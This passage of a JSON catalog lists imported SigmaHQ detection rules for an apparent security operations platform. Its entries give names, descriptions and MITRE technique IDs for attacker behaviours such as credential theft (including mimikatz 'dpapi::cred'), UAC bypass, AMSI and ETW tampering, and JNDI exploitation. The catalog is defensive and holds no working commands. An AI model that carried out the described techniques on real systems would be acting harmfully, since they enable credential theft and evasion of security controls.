"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "403ed92c-b7ec-4edd-9947-5b535ee12d46", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml" } }, { "id": "sigmahq-sigma-407aecb1-e762-4acf-8c7b-d087bcff3bb6", "type": "detection", "name": "Credential Manager Access By Uncommon Applications", "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credential-manager-access-by-uncommon-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_access/file_access_win_susp_credential_manager_access.yml" } }, { "id": "sigmahq-sigma-40967487-139b-4811-81d9-c9767a92aa5a", "type": "detection", "name": "Deployment Deleted From Kubernetes Cluster", "description": "Detects the removal of a deployment from a Kubernetes cluster.\nThis could indicate disruptive activity aiming to impact business operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1498" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/deployment-deleted-from-kubernetes-cluster.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40967487-139b-4811-81d9-c9767a92aa5a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_deployment_deleted.yml" } }, { "id": "sigmahq-sigma-4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", "type": "detection", "name": "Potential PetitPotam Attack Via EFS RPC Calls", "description": "Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1557.001", "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-petitpotam-attack-via-efs-rpc-calls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" } }, { "id": "sigmahq-sigma-4096a49c-7de4-4da0-a230-c66ccd56ea5a", "type": "detection", "name": "Suspicious PowerShell Get Current User", "description": "Detects the use of PowerShell to identify the current logged user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-get-current-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" } }, { "id": "sigmahq-sigma-409f8a98-4496-4aaa-818a-c931c0a8b832", "type": "detection", "name": "Created Files by Microsoft Sync Center", "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/created-files-by-microsoft-sync-center.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "409f8a98-4496-4aaa-818a-c931c0a8b832", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml" } }, { "id": "sigmahq-sigma-40aa399c-7b02-4715-8e5f-73572b493f33", "type": "detection", "name": "Suspicious File Download From IP Via Wget.EXE - Paths", "description": "Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-file-download-from-ip-via-wget-exe-paths.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40aa399c-7b02-4715-8e5f-73572b493f33", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wget_download_susp_locations.yml" } }, { "id": "sigmahq-sigma-40b19fa6-d835-400c-b301-41f3a2baacaf", "type": "detection", "name": "VolumeShadowCopy Symlink Creation Via Mklink", "description": "Shadow Copies storage symbolic link creation using operating systems utilities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1003.002", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/volumeshadowcopy-symlink-creation-via-mklink.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40b19fa6-d835-400c-b301-41f3a2baacaf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" } }, { "id": "sigmahq-sigma-40b1fbe2-18ea-4ee7-be47-0294285811de", "type": "detection", "name": "System Shutdown/Reboot - MacOs", "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-shutdown-reboot-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40b1fbe2-18ea-4ee7-be47-0294285811de", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" } }, { "id": "sigmahq-sigma-40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "type": "detection", "name": "ScreenSaver Registry Key Set", "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/screensaver-registry-key-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" } }, { "id": "sigmahq-sigma-40b95d31-1afc-469e-8d34-9a3a667d058e", "type": "detection", "name": "Suspicious Csi.exe Usage", "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft \u201cRoslyn\u201d Community Technology Preview was named 'rcsi.exe'", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-csi-exe-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40b95d31-1afc-469e-8d34-9a3a667d058e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_csi_execution.yml" } }, { "id": "sigmahq-sigma-40f9af16-589d-4984-b78d-8c2aec023197", "type": "detection", "name": "Potential UAC Bypass Via Sdclt.EXE", "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-uac-bypass-via-sdclt-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "40f9af16-589d-4984-b78d-8c2aec023197", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_sdclt.yml" } }, { "id": "sigmahq-sigma-41025fd7-0466-4650-a813-574aaacbe7f4", "type": "detection", "name": "Malicious PowerShell Scripts - PoshModule", "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-powershell-scripts-poshmodule.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41025fd7-0466-4650-a813-574aaacbe7f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml" } }, { "id": "sigmahq-sigma-410d2a41-1e6d-452f-85e5-abdd8257a823", "type": "detection", "name": "Azure Application Deleted", "description": "Identifies when a application is deleted in Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-application-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "410d2a41-1e6d-452f-85e5-abdd8257a823", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_application_deleted.yml" } }, { "id": "sigmahq-sigma-411742ad-89b0-49cb-a7b0-3971b5c1e0a4", "type": "detection", "name": "Locked Workstation", "description": "Detects locked workstation session events that occur automatically after a standard period of inactivity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/locked-workstation.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_workstation_was_locked.yml" } }, { "id": "sigmahq-sigma-412d55bc-7737-4d25-9542-5b396867ce55", "type": "detection", "name": "JNDIExploit Pattern", "description": "Detects exploitation attempt using the JNDI-Exploit-Kit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/jndiexploit-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "412d55bc-7737-4d25-9542-5b396867ce55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/webserver_generic/web_jndi_exploit.yml" } }, { "id": "sigmahq-sigma-413d4a81-6c98-4479-9863-014785fd579c", "type": "detection", "name": "Okta Admin Role Assigned to an User or Group", "description": "Detects when an the Administrator role is assigned to an user or group.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-admin-role-assigned-to-an-user-or-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "413d4a81-6c98-4479-9863-014785fd579c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_admin_role_assigned_to_user_or_group.yml" } }, { "id": "sigmahq-sigma-41421f44-58f9-455d-838a-c398859841d4", "type": "detection", "name": "ETW Logging Tamper In .NET Processes Via CommandLine", "description": "Detects changes to environment variables related to ETW logging via the CommandLine.\nThis could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/etw-logging-tamper-in-net-processes-via-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41421f44-58f9-455d-838a-c398859841d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml" } }, { "id": "sigmahq-sigma-41504465-5e3a-4a5b-a5b4-2a0baadd4463", "type": "detection", "name": "PsExec Tool Execution From Suspicious Locations - PipeName", "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-tool-execution-from-suspicious-locations-pipename.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_sysinternals_psexec_default_pipe_susp_location.yml" } }, { "id": "sigmahq-sigma-4153a907-2451-4e4f-a578-c52bb6881432", "type": "detection", "name": "Suspicious DNS Query with B64 Encoded String", "description": "Detects suspicious DNS queries using base64 encoding", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048.003", "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dns-query-with-b64-encoded-string.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4153a907-2451-4e4f-a578-c52bb6881432", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/dns/net_dns_susp_b64_queries.yml" } }, { "id": "sigmahq-sigma-416bc4a2-7217-4519-8dc7-c3271817f1d5", "type": "detection", "name": "Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location", "description": "Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories.\nThese DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes or in some cases for evading EDR/AV detection by suspending processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-loading-of-dbgcore-dbghelp-dlls-from-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "416bc4a2-7217-4519-8dc7-c3271817f1d5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_win_susp_dbgcore_dbghelp_load.yml" } }, { "id": "sigmahq-sigma-418a3163-3247-4b7b-9933-dcfcb7c52ea9", "type": "detection", "name": "Compressed File Creation Via Tar.EXE", "description": "Detects execution of \"tar.exe\" in order to create a compressed file.\nAdversaries may abuse various utilities to compress or encrypt data before exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1560", "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/compressed-file-creation-via-tar-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "418a3163-3247-4b7b-9933-dcfcb7c52ea9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_tar_compression.yml" } }, { "id": "sigmahq-sigma-418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "type": "detection", "name": "Potential Mpclient.DLL Sideloading", "description": "Detects potential sideloading of \"mpclient.dll\" by Windows Defender processes (\"MpCmdRun\" and \"NisSrv\") from their non-default directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mpclient-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_windows_defender.yml" } }, { "id": "sigmahq-sigma-41bb431f-56d8-4691-bb56-ed34e390906f", "type": "detection", "name": "UAC Bypass Using MSConfig Token Modification - File", "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-msconfig-token-modification-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41bb431f-56d8-4691-bb56-ed34e390906f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml" } }, { "id": "sigmahq-sigma-41ca393d-538c-408a-ac27-cf1e038be80c", "type": "detection", "name": "Directory Removal Via Rmdir", "description": "Detects execution of the builtin \"rmdir\" command in order to delete directories.\nAdversaries may delete files left behind by the actions of their intrusion activity.\nMalware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.\nRemoval of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/directory-removal-via-rmdir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41ca393d-538c-408a-ac27-cf1e038be80c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_rmdir_execution.yml" } }, { "id": "sigmahq-sigma-41d1058a-aea7-4952-9293-29eaaf516465", "type": "detection", "name": "Removal Of AMSI Provider Registry Keys", "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/removal-of-amsi-provider-registry-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41d1058a-aea7-4952-9293-29eaaf516465", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" } }, { "id": "sigmahq-sigma-41e5c73d-9983-4b69-bd03-e13b67e9623c", "type": "detection", "name": "Equation Group Indicators", "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/equation-group-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41e5c73d-9983-4b69-bd03-e13b67e9623c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" } }, { "id": "sigmahq-sigma-41f407b5-3096-44ea-a74f-96d04fbc41be", "type": "detection", "name": "Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate", "description": "Detects the execution of an AnyDesk binary with a version prior to 8.0.8.\nPrior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.\nUse this rule to detect instances of older versions of Anydesk using the compromised certificate\nThis is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-anydesk-execution-with-known-revoked-signing-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41f407b5-3096-44ea-a74f-96d04fbc41be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml" } }, { "id": "sigmahq-sigma-41f6531d-af6e-4c6e-918f-b946f2b85a36", "type": "detection", "name": "Potential Persistence Via LSA Extensions", "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-lsa-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_lsa_extension.yml" } }, { "id": "sigmahq-sigma-42127bdd-9133-474f-a6f1-97b6c08a4339", "type": "detection", "name": "New Federated Domain Added - Exchange", "description": "Detects the addition of a new Federated Domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-federated-domain-added-exchange.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42127bdd-9133-474f-a6f1-97b6c08a4339", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/exchange/microsoft365_new_federated_domain_added_exchange.yml" } }, { "id": "sigmahq-sigma-42205c73-75c8-4a63-9db1-e3782e06fda0", "type": "detection", "name": "Suspicious Application Allowed Through Exploit Guard", "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-application-allowed-through-exploit-guard.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "source_commit": 